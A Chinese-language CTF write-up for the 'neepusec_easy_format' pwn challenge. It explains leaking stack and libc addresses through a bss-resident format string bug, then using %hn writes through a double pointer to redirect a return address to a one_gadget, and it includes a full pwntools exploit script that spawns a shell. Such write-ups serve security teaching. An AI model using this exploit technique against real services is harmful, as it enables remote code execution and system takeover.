fmt在bss段(neepusec_easy_format)
1.gdb操作
-
vmapp
-
stack
-
retaddr
2.思路
-
先泄漏能够泄漏的地址包括:当前站地址、libc地址
-
然后通过下面的指令进行地址写
#这里是只要覆盖偏移为12的地址值的后两个字节 debug() offset0 = ret&0xffff payload = '%'+str(offset0)+'c%12$hnxxxx\x00' p.sendline(payload) p.recvuntil('xxxx') debug() #这里覆盖偏移为25的地址值的后两个字节 offset1 = one&0xffff payload = '%'+str(offset1) +'c%25$hnxxxx\x00' p.sendline(payload) p.recvuntil('xxxx') debug() #修改的永远是指针指向的值 ############################################# payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00' p.sendline(payload) p.recvuntil('xxxx') debug() offset2 = 0xffff&(one>>16) payload = '%'+str(offset2) +'c%25$hnxxxx\x00' p.sendline(payload) p.recvuntil('xxxx')
-
修改流程
-
未修改前
-
第一次修改
-
第二次修改
-
第三次修改
-
-
注意!!!每次修改的值都是二级指针指向的值,不能直接修改
3. exp
from pwn import *
from LibcSearcher import *
p = process('./pwn')
#p = remote('neepusec.club',18757)
elf = ELF('./pwn')
context.log_level = 'debug'
def debug():
gdb.attach(p)
pause()
payload = '\x00'
p.sendlineafter(':\n',payload)
p.send('aaaa%23$pbbbb%8$p')
p.recvuntil('aaaa0x')
__libc_start_main = int(p.recv(12),16)-231
log.success('__libc_start_main===>'+hex(__libc_start_main))
libc = LibcSearcher('__libc_start_main',__libc_start_main)
libc_base = __libc_start_main - libc.dump('__libc_start_main')
log.success('libc_base==>'+hex(libc_base))
one = [0x4f3d5,0x4f432,0x10a41c]
one = one[0]+libc_base
log.success('one==>'+hex(one))
p.recvuntil('bbbb0x')
ret = int(p.recv(12),16) + 8
log.success('ret==>'+hex(ret))
debug()
offset0 = ret&0xffff
payload = '%'+str(offset0)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
offset1 = one&0xffff
payload = '%'+str(offset1) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
offset2 = 0xffff&(one>>16)
payload = '%'+str(offset2) +'c%25$hnxxxx\x00'
p.sendline(payload)
p.recvuntil('xxxx')
debug()
p.sendline('ls')
p.interactive()